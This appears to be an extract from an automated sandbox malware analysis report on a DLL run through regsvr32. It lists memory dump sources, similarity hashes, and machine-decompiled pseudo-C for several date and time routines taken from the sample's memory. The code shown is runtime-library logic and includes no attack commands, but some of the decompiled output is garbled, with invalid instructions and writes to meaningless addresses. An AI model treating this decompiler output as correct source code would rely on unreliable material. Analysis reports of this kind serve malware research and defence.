                                                                              0x1004594c
                                                                              0x10045952
                                                                              0x10045958
                                                                              0x1004595e
                                                                              0x10045961
                                                                              0x10045967
                                                                              0x10045967
                                                                              0x1004591e
                                                                              0x1004591e
                                                                              0x10045924
                                                                              0x1004592a
                                                                              0x10045930
                                                                              0x10045933
                                                                              0x10045939
                                                                              0x10045939
                                                                              0x00000000
                                                                              0x1004591c
                                                                              0x100458a4
                                                                              0x00000000
                                                                              0x100458a7
                                                                              0x10045872
                                                                              0x1004587f
                                                                              0x10045881
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045881
                                                                              0x100457bf
                                                                              0x100457ce
                                                                              0x100457d6
                                                                              0x100457de
                                                                              0x100457e6
                                                                              0x100457ea
                                                                              0x100457ee
                                                                              0x100457f2
                                                                              0x100457f7
                                                                              0x100457fb
                                                                              0x100457ff
                                                                              0x1004580b
                                                                              0x10045810
                                                                              0x10045815
                                                                              0x1004581b
                                                                              0x00000000
                                                                              0x1004581b
                                                                              0x10045683
                                                                              0x10045650
                                                                              0x10045656
                                                                              0x00000000
                                                                              0x10045658
                                                                              0x10045658
                                                                              0x1004565e
                                                                              0x00000000
                                                                              0x1004565e
                                                                              0x10045621
                                                                              0x10045621
                                                                              0x10045621
                                                                              0x10045b0e
                                                                              0x10045b25
                                                                              0x10045b25

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                              • String ID:
                                                                              • API String ID: 1269745586-0
                                                                              • Opcode ID: 8069beefcfbbbfae0b238ec1bdce4a4afa886301d2ee20133da384fbef8e2f86
                                                                              • Instruction ID: ded34a540c8668614ce5e611bcc4c1d22dac0175b7263de3b54023858ea5c902
                                                                              • Opcode Fuzzy Hash: 8069beefcfbbbfae0b238ec1bdce4a4afa886301d2ee20133da384fbef8e2f86
                                                                              • Instruction Fuzzy Hash: 1CE1CB727142958BD319CF18E981B9977A6F388341FA4813AD9C5C7F95DBBEE490CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800202E0 Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                                                              • Instruction ID: c77f93fcecba916d7a728a8c6eb3e78c0c4fd01b54dcd62d4346d4040ea08623
                                                                              • Opcode Fuzzy Hash: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                                                              • Instruction Fuzzy Hash: 28E11E7090470D8FCF59DF68D446AEE7BB6FB48344F504129EC4EAB251DB74AA08CB86
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10044990 Relevance: .2, Instructions: 225COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E10044990(void* __edx, void* __esp, intOrPtr* __rax, signed char* __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
				long long _v24;
				signed int _t117;
				signed int _t119;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t129;
				unsigned int _t150;
				signed int _t151;
				intOrPtr _t152;
				signed int _t160;
				unsigned int _t163;
				signed int _t166;
				unsigned int _t170;
				signed int _t173;
				signed int _t174;
				unsigned int _t176;
				unsigned int _t181;
				unsigned int _t185;
				signed long long _t188;
				void* _t190;
				unsigned long long _t198;
				signed char* _t214;
				intOrPtr* _t218;
				intOrPtr* _t223;
				intOrPtr* _t228;
				intOrPtr* _t236;
				long long _t240;
				intOrPtr* _t242;
				long long _t243;
				intOrPtr* _t247;
				unsigned long long _t249;
				void* _t250;
				void* _t252;
				intOrPtr _t253;
				signed long long _t254;
				signed long long _t255;
				signed long long _t256;

				_t243 = __rbp;
				_t240 = __rsi;
				_t228 = __rdx;
				_t218 = __rcx;
				_t214 = __rbx;
				_t195 = __rax;
				_t190 = __esp;
				_a8 = __rbx;
				_a16 = __rbp;
				_a32 = __rdi;
				_t247 = __rcx;
				_t236 = __rdx;
				if(__rcx != 0) {
					 *__rcx = 0xffffffff;
					 *((intOrPtr*)(__rcx + 4)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 8)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0xc)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x10)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x14)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x18)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x1c)) = 0xffffffff;
					 *((intOrPtr*)(__rcx + 0x20)) = 0xffffffff;
					if(__rdx == 0) {
						goto L1;
					} else {
						_t253 =  *__rdx;
						if(_t253 >= 0) {
							_t195 = 0x93406fff;
							if(_t253 > 0x93406fff) {
								goto L1;
							} else {
								_a24 = __rsi;
								r10d = 1;
								_t249 = _t253 + __rdx >> 0x18;
								_t198 = _t249 >> 0x3f;
								_t250 = _t249 + _t198;
								r9d = r9d + 0x46;
								_t188 = _t250 - 1;
								asm("cdq");
								_t160 = (0x51eb851f * _t188 >> 0x00000020 >> 0x00000005) + (0x51eb851f * _t188 >> 0x00000020 >> 0x00000005 >> 0x0000001f) & 0x00000003;
								_t150 = __rcx + _t198 - 0x11;
								_t254 = _t253 + ((_t250 - 0x46) * 0xfffffe93 - _t150) * 0x15180;
								if(_t254 >= 0) {
									asm("cdq");
									if((r9d + (_t160 & 0x00000003) & 0x00000003) != (_t160 & 0x00000003)) {
										L14:
										_t150 = _t250 + 0x76c;
										_t163 = 0x51eb851f * _t150 >> 0x20 >> 7;
										_t117 = _t163 >> 0x1f;
										if(_t150 == (_t163 + _t117) * 0x190) {
											goto L15;
										}
									} else {
										_t176 = 0x51eb851f * r9d >> 0x20 >> 5;
										_t117 = _t176 >> 0x1f;
										if(r9d == (_t176 + _t117) * 0x64) {
											goto L14;
										}
									}
								} else {
									_t254 = _t254 + 0x1e13380;
									r9d = _t188;
									asm("cdq");
									if((_t188 + (_t160 & 0x00000003) & 0x00000003) != (_t160 & 0x00000003)) {
										L10:
										_t150 = _t240 + 0x76c;
										_t181 = 0x51eb851f * _t150 >> 0x20 >> 7;
										_t117 = _t181 >> 0x1f;
										if(_t150 == (_t181 + _t117) * 0x190) {
											goto L11;
										}
									} else {
										_t117 = 0x51eb851f * r9d;
										_t185 = 0x51eb851f * r9d >> 0x20 >> 5;
										_t150 = _t185 >> 0x1f;
										if(_t188 != (_t185 + _t150) * 0x64) {
											L11:
											_t254 = _t254 + 0x15180;
										} else {
											goto L10;
										}
									}
								}
								 *(_t247 + 0x14) = r9d;
								_t166 = _t117 * _t254 >> 0x20;
								 *(_t247 + 0x1c) = _t166;
								_t255 = _t254 + _t166 * 0xfffeae80;
								_t252 =  ==  ? 0x1006fce8 : 0x1006fcb0;
								_t119 = _t166;
								_t223 = 0x1006fcb4;
								if( *((intOrPtr*)(0x1006fcb4)) < _t166) {
									do {
										_t223 = _t223 + 4;
										r10d = r10d + 1;
									} while ( *_t223 < _t166);
								}
								r10d = r10d - 1;
								 *(_t247 + 0x10) = r10d;
								 *((intOrPtr*)(_t247 + 0xc)) = _t119 -  *((intOrPtr*)(_t252 + r10d * 4));
								_t242 = _a24;
								 *((intOrPtr*)(_t247 + 0x20)) = 0;
								_t151 = _t150 + 4;
								_t170 = (0x92492493 * _t151 >> 0x20) + _t151 >> 2;
								_t125 = _t170 >> 0x1f;
								_t152 = _t151 - (_t170 + _t125) * 7;
								_t173 = _t125 * _t255 >> 0x20;
								_t126 = _t125 * _t255;
								 *((intOrPtr*)(_t247 + 0x18)) = _t152;
								 *(_t247 + 8) = _t173;
								_t256 = _t255 + _t173 * 0xfffff1f0;
								_t174 = _t126 * _t256 >> 0x20;
								_t127 = _t126 * _t256;
								 *_t242 =  *_t242 + _t174;
								 *0x88888889 =  *0x88888889 + _t127;
								_t129 = _t190;
								if (_t127 + _t152 != 0) goto L21;
								goto L21;
								asm("invalid");
								asm("push ss");
								 *0x88888889 =  *0x88888889 + _t129;
								 *0x888888888888880C =  *((intOrPtr*)(0x888888888888880c)) + _t152;
								asm("les edi, [eax]");
								goto L23;
								L21:
								asm("invalid");
							}
						} else {
							E1003AF40(__rax);
							 *__rax = 0x16;
							return;
						}
					}
				} else {
					L1:
					E1003AF40(_t195);
					r9d = 0;
					r8d = 0;
					 *_t214 =  *_t214 << 0xd2;
					_v24 = _t243;
					 *_t195 = 0x16;
					E1003C790(_t214, _t218, _t228, _t236, _t240, _t243, _t247);
					return;
				}
				L23:
			}









































                                                                              0x10044990
                                                                              0x10044990
                                                                              0x10044990
                                                                              0x10044990
                                                                              0x10044990
                                                                              0x10044990
                                                                              0x10044990
                                                                              0x10044994
                                                                              0x10044999
                                                                              0x100449a3
                                                                              0x100449a8
                                                                              0x100449ad
                                                                              0x100449b0
                                                                              0x100449ed
                                                                              0x100449f3
                                                                              0x100449fa
                                                                              0x10044a01
                                                                              0x10044a08
                                                                              0x10044a0f
                                                                              0x10044a16
                                                                              0x10044a1d
                                                                              0x10044a24
                                                                              0x10044a2b
                                                                              0x00000000
                                                                              0x10044a2d
                                                                              0x10044a2d
                                                                              0x10044a33
                                                                              0x10044a59
                                                                              0x10044a66
                                                                              0x00000000
                                                                              0x10044a6c
                                                                              0x10044a76
                                                                              0x10044a7b
                                                                              0x10044a88
                                                                              0x10044a8f
                                                                              0x10044a93
                                                                              0x10044a9b
                                                                              0x10044aa6
                                                                              0x10044acd
                                                                              0x10044ace
                                                                              0x10044ad6
                                                                              0x10044af5
                                                                              0x10044af8
                                                                              0x10044b5c
                                                                              0x10044b67
                                                                              0x10044b83
                                                                              0x10044b83
                                                                              0x10044b91
                                                                              0x10044b96
                                                                              0x10044ba3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10044b69
                                                                              0x10044b71
                                                                              0x10044b76
                                                                              0x10044b81
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10044b81
                                                                              0x10044afa
                                                                              0x10044afc
                                                                              0x10044b03
                                                                              0x10044b06
                                                                              0x10044b11
                                                                              0x10044b2c
                                                                              0x10044b2c
                                                                              0x10044b39
                                                                              0x10044b3e
                                                                              0x10044b4b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10044b13
                                                                              0x10044b18
                                                                              0x10044b1b
                                                                              0x10044b20
                                                                              0x10044b2a
                                                                              0x10044b4d
                                                                              0x10044b4d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10044b2a
                                                                              0x10044b11
                                                                              0x10044ba8
                                                                              0x10044bc0
                                                                              0x10044bd4
                                                                              0x10044bdf
                                                                              0x10044beb
                                                                              0x10044bf3
                                                                              0x10044bf5
                                                                              0x10044bf9
                                                                              0x10044c00
                                                                              0x10044c00
                                                                              0x10044c04
                                                                              0x10044c08
                                                                              0x10044c00
                                                                              0x10044c11
                                                                              0x10044c18
                                                                              0x10044c20
                                                                              0x10044c27
                                                                              0x10044c3b
                                                                              0x10044c53
                                                                              0x10044c5a
                                                                              0x10044c5f
                                                                              0x10044c71
                                                                              0x10044c73
                                                                              0x10044c73
                                                                              0x10044c76
                                                                              0x10044c8b
                                                                              0x10044c96
                                                                              0x10044ca3
                                                                              0x10044ca3
                                                                              0x10044cf2
                                                                              0x10044cf4
                                                                              0x10044cf8
                                                                              0x10044cf9
                                                                              0x10044cf9
                                                                              0x10044cfb
                                                                              0x10044cfd
                                                                              0x10044cfe
                                                                              0x10044d00
                                                                              0x10044d03
                                                                              0x00000000
                                                                              0x10044cfa
                                                                              0x10044cfa
                                                                              0x10044cfa
                                                                              0x10044a35
                                                                              0x10044a35
                                                                              0x10044a3a
                                                                              0x10044a58
                                                                              0x10044a58
                                                                              0x10044a33
                                                                              0x100449b2
                                                                              0x100449b2
                                                                              0x100449b2
                                                                              0x100449b7
                                                                              0x100449ba
                                                                              0x100449bc
                                                                              0x100449c1
                                                                              0x100449c6
                                                                              0x100449cc
                                                                              0x100449e9
                                                                              0x100449e9
                                                                              0x00000000

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f9ddf7f268fc2225704fef3b645ba6d9fa2fc6381759b809f9c89bbce582549
                                                                              • Instruction ID: d84fa2c4647dfd070808252521cf3fa555d96eece5c7ca3a6a1dc2596e255d47
                                                                              • Opcode Fuzzy Hash: 1f9ddf7f268fc2225704fef3b645ba6d9fa2fc6381759b809f9c89bbce582549
                                                                              • Instruction Fuzzy Hash: 737115B2B016498BCB1CCF1D9C11359A757E399794B29C236EA598FBE4EB38D9028740
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100452A0 Relevance: .2, Instructions: 214COMMONLIBRARYCODECrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E100452A0(void* __ecx, signed int __edx, unsigned int __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r10, signed int _a8, signed int _a40, intOrPtr _a48, intOrPtr _a56, signed int _a64, intOrPtr _a72, intOrPtr _a80, intOrPtr _a88) {
				long long _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v56;
				signed int _t110;
				intOrPtr _t118;
				intOrPtr _t153;
				signed int _t164;
				intOrPtr _t167;
				intOrPtr _t168;
				intOrPtr _t169;
				signed int _t175;
				intOrPtr _t205;
				void* _t220;
				void* _t221;
				long long _t235;
				void* _t238;
				void* _t240;
				intOrPtr _t242;
				signed long long _t243;
				intOrPtr _t245;
				intOrPtr _t247;
				void* _t248;
				void* _t249;
				void* _t252;

				_t249 = __r10;
				_t248 = __r8;
				_t240 = __rdx;
				_t238 = __rcx;
				_t235 = __rbx;
				_t234 = __rax;
				_v8 = __rbx;
				_v16 = __rbp;
				_v24 = __rsi;
				_t164 = r8d;
				_t221 = __ecx;
				_v32 = __rdi;
				_a8 = 0;
				if(__edx != 1) {
					asm("cdq");
					if((_t164 + (__edx & 0x00000003) & 0x00000003) != (__edx & 0x00000003) || _t164 == ((0x51eb851f * _t164 >> 0x20 >> 5) + (0x51eb851f * _t164 >> 0x20 >> 5 >> 0x1f)) * 0x64) {
						_t64 = _t248 + 0x76c; // 0x10000076b
						if(_t64 == ((0x51eb851f * _t64 >> 0x20 >> 7) + (0x51eb851f * _t64 >> 0x20 >> 7 >> 0x1f)) * 0x190) {
							goto L21;
						} else {
							_t234 = r9d;
							r10d =  *((intOrPtr*)(0x10000000 + 0x6fce4 + r9d * 4));
						}
					} else {
						L21:
						_t234 = r9d;
						r10d =  *((intOrPtr*)(0x10000000 + 0x6fcac + r9d * 4));
					}
					r10d = r10d + _a56;
				} else {
					asm("cdq");
					_t220 = (__rdx + __rax & 0x00000003) - (__edx & 0x00000003);
					if(_t220 != 0 || r8d == ((0x51eb851f * _t164 >> 0x20 >> 5) + (0x51eb851f * _t164 >> 0x20 >> 5 >> 0x1f)) * 0x64) {
						_t11 = _t248 + 0x76c; // 0x10000076b
						if(_t11 == ((0x51eb851f * _t11 >> 0x20 >> 7) + (0x51eb851f * _t11 >> 0x20 >> 7 >> 0x1f)) * 0x190) {
							goto L5;
						} else {
							_t252 = 0x10000000;
							_t243 = r9d;
							r10d =  *((intOrPtr*)(0x10000000 + 0x6fce4 + _t243 * 4));
						}
					} else {
						L5:
						_t252 = 0x10000000;
						_t243 = r9d;
						r10d =  *((intOrPtr*)(0x10000000 + 0x6fcac + _t243 * 4));
					}
					r8d = r8d + 0xffffffff;
					_t24 = _t235 + 0x12b; // 0x10000012a
					r10d = r10d + 1;
					r9d = 0x51eb851f * _t24 >> 0x20;
					r9d = r9d >> 7;
					r9d = r9d + (r9d >> 0x1f);
					r9d = r9d - (0x51eb851f * r8d >> 0x20 >> 5) + (0x51eb851f * r8d >> 0x20 >> 5 >> 0x1f);
					asm("cdq");
					_t35 = _t238 - 0x63db; // 0xffff9c24
					r8d = _t234 + _t35;
					r8d = r8d - (((0x92492493 * r8d >> 0x20) + r8d >> 2) + ((0x92492493 * r8d >> 0x20) + r8d >> 2 >> 0x1f)) * 7;
					_t205 = _a48;
					if(r8d > _t205) {
						_t175 = _a40;
						r10d = r10d + _t175 * 7 - r8d + _t205;
					} else {
						_t175 = _a40;
						r10d = _t249 + _t234 - 7;
					}
					if(_t175 == 5) {
						if(_t220 != 0 || _t164 == ((0x51eb851f * _t164 >> 0x20 >> 5) + (0x51eb851f * _t164 >> 0x20 >> 5 >> 0x1f)) * 0x64) {
							_t49 = _t235 + 0x76c; // 0x10000076b
							if(_t49 == ((0x51eb851f * _t49 >> 0x20 >> 7) + (0x51eb851f * _t49 >> 0x20 >> 7 >> 0x1f)) * 0x190) {
								goto L14;
							} else {
								_t153 =  *((intOrPtr*)(_t252 + 0x6fce8 + _t243 * 4));
							}
						} else {
							L14:
							_t153 =  *((intOrPtr*)(_t252 + 0x6fcb0 + _t243 * 4));
						}
						if(r10d > _t153) {
							r10d = r10d - 7;
						}
					}
				}
				_t242 = _v32;
				_t245 = _v24;
				_t247 = _v16;
				if(_t221 != 1) {
					 *0x1006fca4 = r10d;
					 *0x1006fca8 = ((_a64 * 0x3c + _a72) * 0x3c + _a80) * 0x3e8 + _a88;
					if(E10044D20(_t234, _t235,  &_a8, _t240, _t242, _t245, _t247, _t248) != 0) {
						r9d = 0;
						r8d = 0;
						_v56 = 0;
						E1003C6F0(0, _t240, _t248);
					}
					_t167 =  *0x1006fca8; // 0x0
					_t110 = _a8 * 0x3e8;
					_t168 = _t167 + _t110;
					 *0x1006fca8 = _t168;
					if(_t168 >= 0) {
						if(_t168 >= 0x5265c00) {
							_t169 = _t168 - 0x5265c00;
							 *0x1006fca4 =  *0x1006fca4 + 1;
							goto L31;
						}
					} else {
						_t169 = _t168 + 0x5265c00;
						 *0x1006fca4 =  *0x1006fca4 - 1;
						L31:
						 *0x1006fca8 = _t169;
					}
					 *0x1006fca0 = _t164;
					return _t110;
				} else {
					 *0x1006fc94 = r10d;
					 *0x1006fc90 = _t164;
					_t118 = ((_a64 * 0x3c + _a72) * 0x3c + _a80) * 0x3e8 + _a88;
					 *0x1006fc98 = _t118;
					return _t118;
				}
			}





























                                                                              0x100452a0
                                                                              0x100452a0
                                                                              0x100452a0
                                                                              0x100452a0
                                                                              0x100452a0
                                                                              0x100452a0
                                                                              0x100452a7
                                                                              0x100452ac
                                                                              0x100452b1
                                                                              0x100452b6
                                                                              0x100452b9
                                                                              0x100452bb
                                                                              0x100452c0
                                                                              0x100452c8
                                                                              0x10045455
                                                                              0x10045460
                                                                              0x1004547a
                                                                              0x1004549a
                                                                              0x00000000
                                                                              0x1004549c
                                                                              0x100454a3
                                                                              0x100454a6
                                                                              0x100454a6
                                                                              0x100454b0
                                                                              0x100454b0
                                                                              0x100454b7
                                                                              0x100454ba
                                                                              0x100454ba
                                                                              0x100454c2
                                                                              0x100452ce
                                                                              0x100452d1
                                                                              0x100452db
                                                                              0x100452dd
                                                                              0x100452f8
                                                                              0x10045318
                                                                              0x00000000
                                                                              0x1004531a
                                                                              0x1004531a
                                                                              0x10045321
                                                                              0x10045324
                                                                              0x10045324
                                                                              0x1004532e
                                                                              0x1004532e
                                                                              0x1004532e
                                                                              0x10045335
                                                                              0x10045338
                                                                              0x10045338
                                                                              0x10045340
                                                                              0x10045344
                                                                              0x1004534f
                                                                              0x10045355
                                                                              0x10045358
                                                                              0x10045362
                                                                              0x1004537a
                                                                              0x1004537d
                                                                              0x10045395
                                                                              0x10045395
                                                                              0x100453b5
                                                                              0x100453b8
                                                                              0x100453c2
                                                                              0x100453dc
                                                                              0x100453ed
                                                                              0x100453c4
                                                                              0x100453c4
                                                                              0x100453d5
                                                                              0x100453d5
                                                                              0x100453f3
                                                                              0x100453fb
                                                                              0x10045415
                                                                              0x10045434
                                                                              0x00000000
                                                                              0x10045436
                                                                              0x10045436
                                                                              0x10045436
                                                                              0x10045440
                                                                              0x10045440
                                                                              0x10045440
                                                                              0x10045440
                                                                              0x1004544b
                                                                              0x1004544d
                                                                              0x1004544d
                                                                              0x1004544b
                                                                              0x100453f3
                                                                              0x100454ca
                                                                              0x100454cf
                                                                              0x100454d7
                                                                              0x100454dc
                                                                              0x1004552f
                                                                              0x10045557
                                                                              0x10045564
                                                                              0x10045566
                                                                              0x10045569
                                                                              0x10045570
                                                                              0x10045579
                                                                              0x10045579
                                                                              0x1004557e
                                                                              0x10045588
                                                                              0x1004558e
                                                                              0x10045590
                                                                              0x10045596
                                                                              0x100455ad
                                                                              0x100455af
                                                                              0x100455b5
                                                                              0x00000000
                                                                              0x100455b5
                                                                              0x10045598
                                                                              0x10045598
                                                                              0x1004559e
                                                                              0x100455bc
                                                                              0x100455bc
                                                                              0x100455bc
                                                                              0x100455c2
                                                                              0x100455d1
                                                                              0x100454de
                                                                              0x100454e5
                                                                              0x100454ec
                                                                              0x1004550c
                                                                              0x10045513
                                                                              0x10045522
                                                                              0x10045522

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38e934b55f8e7f3ce58a08996e8bace6986bcc5347b298cf3eb511fedb44ec30
                                                                              • Instruction ID: 195602ed9b7751ed00b3741025bf0d61ca84d37a33c5ee5a66fd646d377d1cd2
                                                                              • Opcode Fuzzy Hash: 38e934b55f8e7f3ce58a08996e8bace6986bcc5347b298cf3eb511fedb44ec30
                                                                              • Instruction Fuzzy Hash: 1D811472B142854BC31CCB28E952759B697F3D8345FA98035EA45CFF99EB7AE9408B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003BD80 Relevance: .2, Instructions: 207COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 78%
                                                                              			E1003BD80(void* __edx, long long __rbx, long long __rcx, signed long long __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, long long _a16, void* _a24, void* _a32) {
				intOrPtr _v24;
				char _v56;
				signed long long _v64;
				char _v68;
				char _v72;
				long long _v88;
				signed int _t95;
				intOrPtr _t96;
				signed int _t102;
				signed int _t103;
				intOrPtr _t119;
				void* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t137;
				void* _t142;
				void* _t144;
				intOrPtr* _t146;
				signed long long _t147;
				signed long long _t176;
				signed long long _t177;
				intOrPtr* _t189;
				signed long long _t198;
				intOrPtr _t214;
				intOrPtr* _t215;
				void* _t216;
				signed long long _t218;
				signed long long _t224;
				intOrPtr _t226;

				_t212 = __rbp;
				_t210 = __rsi;
				_t208 = __rdi;
				_t194 = __rdx;
				_t174 = __rcx;
				_t146 = _t215;
				 *((long long*)(_t146 + 8)) = __rbx;
				 *((long long*)(_t146 + 0x18)) = __rsi;
				 *((long long*)(_t146 + 0x20)) = __rdi;
				_t172 = __rcx;
				 *((intOrPtr*)(_t146 - 0x44)) = 0;
				 *((intOrPtr*)(_t146 - 0x48)) = 0;
				_t142 = __edx;
				if(__rcx != 0) {
					_t224 =  *((intOrPtr*)(__rcx + 0x14));
					_v64 = _t224;
					_t147 = _t224 - 0x45;
					if(_t147 > 0x408) {
						L23:
						_t96 = E1003AF40(_t147);
						 *_t147 = 0x16;
						L24:
						L25:
						return _t96;
					}
					_t125 =  *(__rcx + 0x10);
					if(_t125 < 0 || _t125 > 0xb) {
						_t95 = _t194 + _t194 * 2 << 2;
						_t126 = _t125 - _t95;
						_t224 = _t224 + (0x2aaaaaab * _t125 >> 0x20 >> 1) + (0x2aaaaaab * _t125 >> 0x20 >> 1 >> 0x1f);
						 *(_t172 + 0x10) = _t126;
						_v64 = _t224;
						if(_t126 < 0) {
							_t95 = _t174 + 0xc;
							_t224 = _t224 - 1;
							 *(_t172 + 0x10) = _t95;
							_v64 = _t224;
						}
						_t147 = _t224 - 0x45;
						if(_t147 > 0x408) {
							goto L23;
						} else {
							goto L8;
						}
					} else {
						L8:
						_t226 =  *((intOrPtr*)(0x1006fce8 +  *(_t172 + 0x10) * 4));
						asm("dec eax");
						_a16 = _t212;
						_t102 = _t95 & 0x00000003;
						if(_t224 + _t194 != _t194) {
							L10:
							_t176 = _t224 + 0x76c;
							_t103 = _t102 * _t176;
							_t198 = ((_t194 + _t176 >> 8) + (_t194 + _t176 >> 8 >> 0x3f)) * 0x190;
							if(_t176 != _t198) {
								L13:
								_t177 = _t224 + 0x12b;
								_t218 = _t224 - 1;
								_t214 = _a16;
								_t200 = _t198 + _t218 >> 6;
								_t201 = (_t198 + _t218 >> 6) + (_t200 >> 0x3f);
								asm("dec eax");
								_t137 = _t103 * _t177 * _t218 >> 0x00000020 & 0x00000003;
								_t147 =  *_t172 + ( *((intOrPtr*)(_t172 + 4)) + ( *((intOrPtr*)(_t172 + 8)) + (_t224 * 0x16d + (_t218 + (_t198 + _t218 >> 6) + (_t200 >> 0x3f) >> 2) + _t226 + (_t177 + _t198 >> 8) + (_t177 + _t198 >> 8 >> 0x3f) +  *((intOrPtr*)(_t172 + 0xc)) - (_t198 + _t218 >> 6) + (_t200 >> 0x3f) - 0x63df + (_t224 * 0x16d + (_t218 + (_t198 + _t218 >> 6) + (_t200 >> 0x3f) >> 2) + _t226 + (_t177 + _t198 >> 8) + (_t177 + _t198 >> 8 >> 0x3f) +  *((intOrPtr*)(_t172 + 0xc)) - (_t198 + _t218 >> 6) + (_t200 >> 0x3f) - 0x63df) * 2 << 3)) * 0x3c) * 0x3c;
								_v64 = _t147;
								if(_t142 == 0) {
									if(E10044990(_t137, _t144, _t147, _t172,  &_v56,  &_v64, _t208, _t210, _t214) != 0) {
										goto L23;
									}
									L27:
									_t189 =  &_v56;
									 *_t172 =  *_t189;
									 *((intOrPtr*)(_t172 + 4)) =  *((intOrPtr*)(_t189 + 4));
									 *((intOrPtr*)(_t172 + 8)) =  *((intOrPtr*)(_t189 + 8));
									 *((intOrPtr*)(_t172 + 0xc)) =  *((intOrPtr*)(_t189 + 0xc));
									 *(_t172 + 0x10) =  *(_t189 + 0x10);
									 *((intOrPtr*)(_t172 + 0x14)) =  *((intOrPtr*)(_t189 + 0x14));
									 *((intOrPtr*)(_t172 + 0x18)) =  *((intOrPtr*)(_t189 + 0x18));
									 *((intOrPtr*)(_t172 + 0x1c)) =  *((intOrPtr*)(_t189 + 0x1c));
									_t96 =  *((intOrPtr*)(_t189 + 0x20));
									 *((intOrPtr*)(_t172 + 0x20)) = _t96;
									goto L25;
								}
								E10045B70();
